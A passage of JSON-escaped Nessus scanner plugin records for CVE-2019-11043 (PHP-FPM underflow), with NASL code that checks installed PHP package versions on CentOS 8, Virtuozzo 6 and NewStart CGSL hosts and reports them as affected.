\"php-devel-5.3.3-50.el6_10\",\n \"php-embedded-5.3.3-50.el6_10\",\n \"php-enchant-5.3.3-50.el6_10\",\n \"php-fpm-5.3.3-50.el6_10\",\n \"php-gd-5.3.3-50.el6_10\",\n \"php-imap-5.3.3-50.el6_10\",\n \"php-intl-5.3.3-50.el6_10\",\n \"php-ldap-5.3.3-50.el6_10\",\n \"php-mbstring-5.3.3-50.el6_10\",\n \"php-mysql-5.3.3-50.el6_10\",\n \"php-odbc-5.3.3-50.el6_10\",\n \"php-pdo-5.3.3-50.el6_10\",\n \"php-pgsql-5.3.3-50.el6_10\",\n \"php-process-5.3.3-50.el6_10\",\n \"php-pspell-5.3.3-50.el6_10\",\n \"php-recode-5.3.3-50.el6_10\",\n \"php-snmp-5.3.3-50.el6_10\",\n \"php-soap-5.3.3-50.el6_10\",\n \"php-tidy-5.3.3-50.el6_10\",\n \"php-xml-5.3.3-50.el6_10\",\n \"php-xmlrpc-5.3.3-50.el6_10\",\n \"php-zts-5.3.3-50.el6_10\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:33", "description": "The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the CESA-2019:3736 advisory.\n\n - php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-01-29T00:00:00", "type": "nessus", "title": "CentOS 8 : php:7.3 (CESA-2019:3736)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:apcu-panel", "p-cpe:/a:centos:centos:libzip", "p-cpe:/a:centos:centos:libzip-devel", "p-cpe:/a:centos:centos:libzip-tools", "p-cpe:/a:centos:centos:php-pear", "p-cpe:/a:centos:centos:php-pecl-apcu", "p-cpe:/a:centos:centos:php-pecl-apcu-devel", "p-cpe:/a:centos:centos:php-pecl-zip"], "id": "CENTOS8_RHSA-2019-3736.NASL", "href": "https://www.tenable.com/plugins/nessus/145689", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2019:3736. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145689);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"RHSA\", value:\"2019:3736\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"CentOS 8 : php:7.3 (CESA-2019:3736)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2019:3736 advisory.\n\n - php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3736\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apcu-panel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libzip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libzip-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libzip-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pecl-apcu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pecl-apcu-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pecl-zip\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/CentOS/release');\nif (isnull(os_release) || 'CentOS' >!< os_release) audit(AUDIT_OS_NOT, 'CentOS');\nvar os_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< os_release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\nvar module_ver = get_kb_item('Host/RedHat/appstream/php');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module php:7.3');\nif ('7.3' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module php:' + module_ver);\n\nvar appstreams = {\n 'php:7.3': [\n {'reference':'apcu-panel-5.1.17-1.module_el8.1.0+252+0d4e049c', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apcu-panel-5.1.17-1.module_el8.1.0+252+0d4e049c', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-1.5.2-1.module_el8.1.0+252+0d4e049c', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-1.5.2-1.module_el8.1.0+252+0d4e049c', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-devel-1.5.2-1.module_el8.1.0+252+0d4e049c', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-devel-1.5.2-1.module_el8.1.0+252+0d4e049c', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-tools-1.5.2-1.module_el8.1.0+252+0d4e049c', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libzip-tools-1.5.2-1.module_el8.1.0+252+0d4e049c', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pear-1.10.9-1.module_el8.1.0+252+0d4e049c', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pear-1.10.9-1.module_el8.1.0+252+0d4e049c', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-apcu-5.1.17-1.module_el8.1.0+252+0d4e049c', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-apcu-5.1.17-1.module_el8.1.0+252+0d4e049c', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-apcu-devel-5.1.17-1.module_el8.1.0+252+0d4e049c', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-apcu-devel-5.1.17-1.module_el8.1.0+252+0d4e049c', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-zip-1.15.4-1.module_el8.1.0+252+0d4e049c', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'php-pecl-zip-1.15.4-1.module_el8.1.0+252+0d4e049c', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n};\n\nvar flag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n var appstream = NULL;\n var appstream_name = NULL;\n var appstream_version = NULL;\n var appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && _release) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module php:7.3');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apcu-panel / libzip / libzip-devel / libzip-tools / php-pear / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:07", "description": "An update for php is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-22T00:00:00", "type": "nessus", "title": "Virtuozzo 6 : php / php-bcmath / php-cli / php-common / php-dba / etc (VZLSA-2019-3287)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:php", "p-cpe:/a:virtuozzo:virtuozzo:php-bcmath", "p-cpe:/a:virtuozzo:virtuozzo:php-cli", "p-cpe:/a:virtuozzo:virtuozzo:php-common", "p-cpe:/a:virtuozzo:virtuozzo:php-dba", "p-cpe:/a:virtuozzo:virtuozzo:php-devel", "p-cpe:/a:virtuozzo:virtuozzo:php-embedded", "p-cpe:/a:virtuozzo:virtuozzo:php-enchant", "p-cpe:/a:virtuozzo:virtuozzo:php-fpm", "p-cpe:/a:virtuozzo:virtuozzo:php-gd", "p-cpe:/a:virtuozzo:virtuozzo:php-imap", "p-cpe:/a:virtuozzo:virtuozzo:php-intl", "p-cpe:/a:virtuozzo:virtuozzo:php-ldap", "p-cpe:/a:virtuozzo:virtuozzo:php-mbstring", "p-cpe:/a:virtuozzo:virtuozzo:php-mysql", "p-cpe:/a:virtuozzo:virtuozzo:php-odbc", "p-cpe:/a:virtuozzo:virtuozzo:php-pdo", "p-cpe:/a:virtuozzo:virtuozzo:php-pgsql", "p-cpe:/a:virtuozzo:virtuozzo:php-process", "p-cpe:/a:virtuozzo:virtuozzo:php-pspell", "p-cpe:/a:virtuozzo:virtuozzo:php-recode", "p-cpe:/a:virtuozzo:virtuozzo:php-snmp", "p-cpe:/a:virtuozzo:virtuozzo:php-soap", "p-cpe:/a:virtuozzo:virtuozzo:php-tidy", "p-cpe:/a:virtuozzo:virtuozzo:php-xml", "p-cpe:/a:virtuozzo:virtuozzo:php-xmlrpc", "p-cpe:/a:virtuozzo:virtuozzo:php-zts", "cpe:/o:virtuozzo:virtuozzo:6"], "id": "VIRTUOZZO_VZLSA-2019-3287.NASL", "href": "https://www.tenable.com/plugins/nessus/144531", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144531);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"Virtuozzo 6 : php / php-bcmath / php-cli / php-common / php-dba / etc (VZLSA-2019-3287)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for php is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2019-3287.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9be91a71\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3287\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php / php-bcmath / php-cli / php-common / php-dba / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:php-zts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.3.3-50.vl6\",\n \"php-bcmath-5.3.3-50.vl6\",\n \"php-cli-5.3.3-50.vl6\",\n \"php-common-5.3.3-50.vl6\",\n \"php-dba-5.3.3-50.vl6\",\n \"php-devel-5.3.3-50.vl6\",\n \"php-embedded-5.3.3-50.vl6\",\n \"php-enchant-5.3.3-50.vl6\",\n \"php-fpm-5.3.3-50.vl6\",\n \"php-gd-5.3.3-50.vl6\",\n \"php-imap-5.3.3-50.vl6\",\n \"php-intl-5.3.3-50.vl6\",\n \"php-ldap-5.3.3-50.vl6\",\n \"php-mbstring-5.3.3-50.vl6\",\n \"php-mysql-5.3.3-50.vl6\",\n \"php-odbc-5.3.3-50.vl6\",\n \"php-pdo-5.3.3-50.vl6\",\n \"php-pgsql-5.3.3-50.vl6\",\n \"php-process-5.3.3-50.vl6\",\n \"php-pspell-5.3.3-50.vl6\",\n \"php-recode-5.3.3-50.vl6\",\n \"php-snmp-5.3.3-50.vl6\",\n \"php-soap-5.3.3-50.vl6\",\n \"php-tidy-5.3.3-50.vl6\",\n \"php-xml-5.3.3-50.vl6\",\n \"php-xmlrpc-5.3.3-50.vl6\",\n \"php-zts-5.3.3-50.vl6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:14:07", "description": "The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has php packages installed that are affected by a vulnerability:\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution. (CVE-2019-11043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-01-20T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.05 / MAIN 5.05 : php Vulnerability (NS-SA-2020-0001)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2020-0001_PHP.NASL", "href": "https://www.tenable.com/plugins/nessus/133087", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2020-0001. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133087);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"NewStart CGSL CORE 5.05 / MAIN 5.05 : php Vulnerability (NS-SA-2020-0001)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has php packages installed that are affected by a\nvulnerability:\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24\n and 7.3.x below 7.3.11 in certain configurations of FPM\n setup it is possible to cause FPM module to write past\n allocated buffers into the space reserved for FCGI\n protocol data, thus opening the possibility of remote\n code execution. (CVE-2019-11043)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2020-0001\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL php packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL CORE 5.05\" &&\n release !~ \"CGSL MAIN 5.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.05 / NewStart CGSL MAIN 5.05');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 